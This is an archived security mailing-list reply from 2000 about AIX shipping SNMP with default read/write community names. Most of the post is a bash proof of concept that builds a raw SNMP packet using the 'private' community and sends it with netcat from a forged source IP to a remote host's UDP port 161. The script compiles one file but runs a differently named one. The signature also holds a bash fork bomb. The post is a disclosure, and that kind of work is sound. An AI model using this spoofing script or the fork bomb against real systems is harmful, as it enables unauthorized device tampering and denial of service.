On Tue, 15 Feb 2000, harikiri wrote: > It appears that on the above releases of AIX, the SNMP daemon is > enabled by default and two community names are enabled with read/write > privileges. The community names are "private" and "system", but are > only allowed from localhost connections. Nevertheless, a local user > may install an SNMP client, and modify sensitive variables. SNMP requests with no authentication except for source-IP comparsion, are spoofable. --snip-- #!/bin/bash cat >/tmp/spoof1.c <<_EOF_ char private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202" "\0\20\6\10+\6\1\2\1\1\4\0\4\4null"; main() { write(1,private,sizeof(private)); } _EOF_ gcc -o /tmp/spoof1 /tmp/spoof1.c /tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161 --snip-- UDP blind spoofing, nothing easier. _______________________________________________________ Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:37 PDT